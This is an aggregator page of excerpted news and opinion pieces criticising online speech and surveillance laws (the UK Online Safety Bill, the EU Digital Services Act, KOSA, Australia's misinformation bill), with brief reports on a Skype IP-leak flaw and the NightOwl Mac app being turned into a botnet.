The UK Government Knows How Extreme The Online Safety Bill Is

The U.K.’s Online Safety Bill (OSB) has passed a critical final stage in the House of Lords, and envisions a potentially vast scheme to surveil internet users.

The bill would empower the U.K. government, in certain situations, to demand that online platforms use government-approved software to search through all users’ photos, files, and messages, scanning for illegal content. Online services that don’t comply can be subject to extreme penalties, including criminal penalties.

Such a backdoor scanning system can and will be exploited by bad actors. It will also produce false positives, leading to false accusations of child abuse that will have to be resolved. That’s why the OSB is incompatible with end-to-end encryption—and human rights. EFF has strongly opposed this bill from the start.

Now, with the bill on the verge of becoming U.K. law, the U.K. government has sheepishly acknowledged that it may not be able to make use of some aspects of this law. During a final debate over the bill, a representative of the government said that orders to scan user files “can be issued only where technically feasible,” as determined by Ofcom, the U.K.’s telecom regulatory agency. He also said any such order must be compatible with U.K. and European human rights law.

That’s a notable step back, since previously the same representative, Lord Parkinson of Whitley Bay, said in a letter to the House of Lords that the technology that would magically make invasive scanning co-exist with end-to-end encryption already existed. “We have seen companies develop such solutions for platforms with end-to-end encryption before,” wrote Lord Parkinson in that letter.

Keep reading

U.K. Government Finally Admits It Can’t Scan for Child Porn Without Violating Everybody’s Privacy

The U.K. government finally acknowledges that a component of the Online Safety Bill that would force tech companies to scan data and messages for child porn images can’t be implemented without violating the privacy rights of all internet users and undermining the data encryption tools that keep our information safe.

And so the government is backing down—for now—on what’s been called the “spy clause.” Using the justification of fighting the spread of child sexual abuse material (CSAM), part of the Online Safety Bill would have required online platforms to create “backdoors” that the British government could use to scan messages between social media users. The law also would’ve allowed the government to punish platforms or sites that implement end-to-end encryption and prevent the government from accessing messages and data.

While British officials have insisted that this intrusive surveillance power would be used only to track down CSAM, tech and privacy experts have warned repeatedly that there’s no way to implement a surveillance system that could be used only for this particular purpose. Encryption backdoors allow criminals and oppressive governments to snoop on people for dangerous and predatory purposes. Firms like Signal and WhatsApp threatened to pull their services from the U.K. entirely if this bill component moved forward.

Keep reading

Direct Government Censorship Of The Internet Is Here

Censorship of the Internet has been getting worse for years, but we just crossed a threshold which is going to take things to a whole new level. 

On August 25th, a new law known as the “Digital Services Act” went into effect in the European Union.  Under this new law, European bureaucrats will be able to order big tech companies to censor any content that is considered to be “illegal”, “disinformation” or “hate speech”.  That includes content that is posted by users outside of the European Union, because someone that lives in the European Union might see it.  I wrote about this a few days ago, but I don’t think that people are really understanding the implications of this new law.  In the past, there have been times when governments have requested that big tech companies take down certain material, but now this new law will give government officials the power to force big tech companies to take down any content that they do not like. 

Any big tech companies that choose not to comply will be hit with extremely harsh penalties.

Of course mainstream news outlets such as the Washington Post are attempting to put a positive spin on this new law.  We are being told that it will “safeguard” us from “illegal content” and “disinformation”…

New rules meant to safeguard people from illegal content, targeted ads, unwanted algorithmic feeds and disinformation online are finally in force, thanks to new regulation in the European Union that took effect this month.

Doesn’t that sound wonderful?

Keep reading

Talking About Sex Online Shouldn’t Be Illegal

Kayden Kross, an adult film entrepreneur and a former business partner of mine, sent me a text message a few months ago. She was excited—she was seeing a community of straight dudes gather on Deeper, the power exchange and BDSM-themed website she owns, to discuss their sexual preferences, turn-ons, and other various tastes. And she was seeing this across other platforms too. This felt rare to her, and groundbreaking to me. 

When I asked Lucie Fielding, a mental health counselor in Washington state, how many spaces she was aware of for straight men to have these conversations, she said “Oh, not many—unless we’re talking incels—there’s got to be stuff on Reddit, but apart from that, these are such important forums. Because there’s such a societal pressure for men not to be talking with one another about these things.” But on platforms like Deeper, PornHub, and other online providers of adult videos, the comments section is just that sort of conversation.

Kross described the communities as having creeds of acceptance, giving examples such as “The ‘don’t yuck my yum’ thing. It’s agreed upon that so long as you are not saying something that is a political minefield, it is not OK to dog on someone else’s expression of what they’re there for. And when people do, even if it’s something where you can’t imagine anyone would be into that, you’ll see people rush to that person’s defense. There’s very much this understanding that in order for this to work, everyone has to agree not to add shame to the pile.”

And it isn’t just sexuality being shared. Someone might say, according to Kross, “‘My dog died today.’ And then someone else will chime in with, ‘Oh, I’m so sorry.’ And then the person will say, ‘I had no one,’ and ‘I’m alone.’ And then someone else would be like, ‘Well, I would have given you a hug if I was there.’ We all know, there’s this kind of idea of traditional masculinity, and the expectations are that men don’t really talk about their feelings. And the fact is, in the comment section, when you’re anonymous, you’re not subject any longer to expectations, right? That’s why we have trolls. But it’s also why you end up with these kinds of conversations that, you know—otherwise, who would you have them with?”

But these conversations, like so many others, are at risk of being censored out of existence. New state laws requiring verification of consumers’ ages threaten to wipe out small producers and scare off subscribers concerned about threats to their own reputations in the event of a data breach. Laws like SESTA/FOSTA have made promotion of adult entertainment—already an uphill battle—even more starkly difficult, reaching as far as those Reddit communities Fielding mentioned and causing many subreddits about sexuality to shutter. And payment processors and banks have been denying adult workers access to financial infrastructure for decades.

Why does freedom of speech and freedom from shame matter in this context? According to Fielding, “Shame tells us that we are bad. That our desires are bad, that our pleasure isn’t valid. And the relationship between shame and isolation is that when we feel that we are bad or that there’s something to be ashamed of, we withdraw because we don’t want to share that.… That leads to social withdrawal.… It means that folks are trying things in very risky ways, because they don’t have the community around them.” One example is choking—without proper safety and risk-informed consent, this risky activity can turn deadly with alarming ease.

Keep reading

Hackers Can Silently Grab Your IP Through Skype — Microsoft Is In No Rush to Fix It

Hackers are able to grab a target’s IP address, potentially revealing their general physical location, by simply sending a link over the Skype mobile app. The target does not need to click the link or otherwise interact with the hacker beyond opening the message, according to a security researcher who demonstrated the issue and successfully discovered my IP address by using it.

Yossi, the independent security researcher who uncovered the vulnerability, reported the issue to Microsoft earlier this month, according to Yossi and a cache of emails and bug reports he shared with 404 Media. In those emails Microsoft said the issue does not require immediate servicing, and gave no indication that it plans to fix the security hole. Only after 404 Media contacted Microsoft for comment did the company say it would patch the issue in an upcoming update.

The attack could pose a serious risk to activists, political dissidents, journalists, those targeted by cybercriminals, and many more people. At minimum, an IP address can show what area of a city someone is in. An IP address can be even more revealing in a less densely populated area, because there are fewer people who could be associated with it.

“I think just about anybody could be harmed by this,” Cooper Quintin, a security researcher and senior public interest technologist at activist organization the Electronic Frontier Foundation (EFF), said when I explained the issue to him. Quintin said the major concern was “finding people’s location for physical escalations, and finding people’s IP address for digital escalations.”

To verify that the vulnerability has the impact that Yossi described, I asked him to test it out on me. To start, Yossi sent me a link via Skype text chat to google.com. The link was to the real Google site, and not an imposter.

I then opened Skype on an iPad and viewed the chat message. I didn’t even click the link. But very soon after, Yossi pasted my IP address into the chat. It was correct.

Keep reading

How a Well-Regarded Mac App Became a Trojan Horse

In the early days of macOS Mojave in 2018, Apple hadn’t offered users a way to automatically switch to dark and light mode at different times of the day. As usual, there were third-party developers eager to pick up the slack. One of the more well-regarded night mode apps to fix this issue was NightOwl, first released in the middle of 2018, a small app with a simple utility that could run in the background during day-to-day use.

With more official macOS features added in 2021 that enabled the “Night Shift” dark mode, the NightOwl app was left forlorn and forgotten on many older Macs. Few of those supposed tens of thousands of users likely noticed when the app they ran in the background of their older Macs was bought by another company, nor when earlier this year that company silently updated the dark mode app so that it hijacked their machines in order to send their IP data through a server network of affected computers, AKA a botnet.

After some users noted issues with the app after a June update, web developer Taylor Robinson discovered the problem ran deep, as the program redirected users’ computers’ connections without any notification. The real dark mode turned out to be the transformation of a respectable Mac app into a playground for data harvesters.

In an email with Gizmodo, Robinson broke down their own investigation into the app. They found that NightOwl installs a launcher that turns the users’ computer into a kind of botnet agent for data that’s sold to third parties. The updated 0.4.5.4 version of NightOwl, released June 13, runs a local HTTP proxy without users’ direct knowledge or consent, they said. The only hint NightOwl gives to users that something’s afoot is a consent notice after they hit the download button, saying the app uses Google Analytics for anonymized tracking and bugs. The botnet settings cannot be disabled through the app, and in order to remove the modifications made to a Mac, users need to run several commands in the Mac Terminal app to excise the vestiges of the code from their system, per Robinson.

It’s currently unclear how many users were affected by the seemingly malicious code, especially as NightOwl has since become unavailable on both the website and app store. The NightOwl site claims the app was downloaded more than 141,000 times, and that there were more than 27,000 active users on the app. Even if the app lost most of its users after Apple installed new Dark Mode software, there were potentially thousands of users running NightOwl on their old Macs.

Keep reading

Australia’s Misinfo Bill Paves Way for Soviet-Style Censorship

The Australian Government’s proposed new laws to crack down on misinformation and disinformation have drawn intense criticism for their potential to restrict free expression and political dissent, paving the way for a digital censorship regime reminiscent of Soviet Lysenkoism.

Under the draft legislation, the Australian Communications and Media Authority (ACMA) will gain considerable expanded regulatory powers to “combat misinformation and disinformation,” which ACMA says poses a “threat to the safety and wellbeing of Australians, as well as to our democracy, society and economy.”

Digital platforms will be required to share information with ACMA on demand, and to implement stronger systems and processes for handling of misinformation and disinformation.

ACMA will be empowered to devise and enforce digital codes with a “graduated set of tools” including infringement notices, remedial directions, injunctions and civil penalties, with fines of up to $550,000 (individuals) and $2.75 million (corporations). Criminal penalties, including imprisonment, may apply in extreme cases.

Controversially, the government will be exempt from the proposed laws, as will professional news outlets, meaning that ACMA will not compel platforms to police misinformation and disinformation disseminated by official government or news sources.

As the government and professional news outlets have been, and continue to be, a primary source of online misinformation and disinformation, it is unclear that the proposed laws will meaningfully reduce online misinformation and disinformation. Rather, the legislation will enable the proliferation of official narratives, whether true, false or misleading, while quashing the opportunity for dissenting narratives to compete.

Keep reading

A Ham-Handed Bill Attacks the First Amendment in the Name of Protecting Minors From Online Harm

Late last month, a Senate committee considered a 50-page bill with a name that includes the word kids and approved it unanimously. Those two facts alone are enough to raise the suspicion that legislators are heading down a winding road toward a destination they only dimly perceive.

That suspicion is amply supported by the text of the Kids Online Safety Act (KOSA), which ham-handedly aims to shield children and teenagers from vaguely defined dangers lurking on the internet. The unintended but foreseeable results are apt to include invasions of privacy that compromise First Amendment rights and a chilling impact on constitutionally protected speech, both of which will harm adults as well as the “kids” whom the bill is supposed to protect.

KOSA imposes an amorphous “duty of care” on platforms, online games, messaging applications, and streaming services, demanding “reasonable measures” to “protect” against and “mitigate” various “harms” to users younger than 17. The targeted dangers include anxiety, depression, suicide, eating disorders, substance abuse, “addiction-like behaviors,” physical violence, online bullying, harassment, sexual exploitation and abuse, “financial harms,” and promotion of “narcotic drugs,” tobacco products, alcohol, or gambling.

That’s a tall order, and it is not at all clear what meeting this obligation would entail. Nor is it clear when the duty of care applies.

As amended by the Senate Commerce Committee, KOSA applies to any “covered platform” that “knows” its users include minors. But no one knows what “knows” means.

In addition to “actual knowledge,” that condition can be satisfied by “knowledge fairly implied on the basis of objective circumstances.” KOSA directs the Federal Trade Commission (FTC), within 18 months of the bill’s passage, to issue “guidance” about how to understand the latter phrase.

That guidance, however, would not bind the FTC, which is charged with investigating and penalizing platforms that it thinks have violated KOSA. Nor would it constrain state attorneys general, who would be authorized to independently enforce KOSA through “civil actions.”

An earlier version of KOSA provoked criticism from civil libertarians who warned that it would effectively require platforms to verify users’ ages, which would entail collecting personal information. That was a clear threat to internet users of all ages who want to engage in speech without revealing their identities, a well-established First Amendment right.

In response to that concern, the latest version of KOSA revises the duty-of-care test and explicitly says it does not require “age gating or age verification.” But given the burdens the bill imposes and the uncertainty about what counts as “knowledge fairly implied,” platforms still would have a strong incentive to exclude minors or minimize the number of users who are younger than 17.

Keep reading

Democrat State Attorneys General File Brief In Support of Biden Censorship Power

In a move that underscores the unceasing tension between free speech and the control of information online, 20 Democratic state attorneys general have made appeals through federal court to restore their power in urging social media entities to censor user content.

Headlined by New York Attorney General Letitia James, the collective is adamant that federal court decisions are hindering their capability to prevent the circulation of misleading information.

July 4 saw US District Judge Terry Doughty issue a directive that greatly restrains government officials’ influence over social media moderation, after there was enough evidence already presented to show possible First Amendment violations.

Stemming from a lawsuit filed in May 2022 by Republican attorneys in Louisiana and Missouri, the verdict argued that both the presiding Biden administration had unjustly pressured social media platforms into suppressing posts perceived as potential triggers for vaccine hesitancy during the COVID-19 crisis or destabilizers for electoral processes.

This pursuit for moderation by government officials, the suit asserted, unjustly infringed upon the First Amendment right to free speech. In particular, these assertions were aimed at tech conglomerates like Meta’s Facebook and Google’s YouTube, accused of commencing the limitation of information dissemination allegedly deemed misleading circa 2019.

Currently held in suspension due to an appeal by the Biden administration, the order, should it be reactivated by the 5th Circuit, will prevent government departments, including the likes of the Department of Health and Human Services and the Federal Bureau of Investigation, from communication with social media companies for the removal or suppression of content considered as protected free speech under the First Amendment.

Keep reading

Senators Introduce Bipartisan Bill to Regulate Online Speech

Senators Elizabeth Warren (D-MA) and Lindsey Graham (R-SC) have introduced a bill to create a new federal government commission overseeing online communication. The legislation is presented as consumer protection but grants new government authorities to police speech on the internet. 

“For too long, giant tech companies have exploited consumers’ data, invaded Americans’ privacy, threatened our national security, and stomped out competition in our economy,” said Warren. “This bipartisan bill would create a new tech regulator and makes clear that reining in Big Tech platforms is a top priority on both sides of the aisle.”

“For years, I have been trying to find ways to empower consumers against Big Tech,” Graham claimed. “I have heard too many stories from families who feel helpless in the face of Big Tech. … The creation of a regulatory commission to oversee Big Tech is the first step in a long journey to protect American consumers from the massive power these companies currently wield.”

The bill will establish a Digital Consumer Protection Commission that will designate some websites as “dominant platforms.” It appears those sites will be in the crosshairs of the new commission as the legislation instructs the new agency “to intentionally avoid having the platform meet the qualifications for designation as a dominant platform.”

The “dominant platforms will be required to inform the government of their content moderation policies. The bill will require designated companies to “make publicly available, through clear and conspicuous disclosure, the dominant platform’s terms of service, which shall include the criteria the operator employs in content moderation practices.”

Keep reading